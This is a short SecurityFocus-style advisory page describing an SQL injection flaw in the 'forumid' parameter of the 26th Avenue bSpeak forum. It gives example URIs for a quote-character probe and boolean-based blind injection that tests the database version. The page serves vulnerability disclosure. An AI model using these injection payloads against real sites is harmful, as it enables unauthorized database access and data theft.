26th Avenue bSpeak 'forumid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/forum/index.php?action=post&forumid=3'
http://www.example.com/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=4 oui
http://www.example.com/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=5 no


 

Privacy Statement
Copyright 2010, SecurityFocus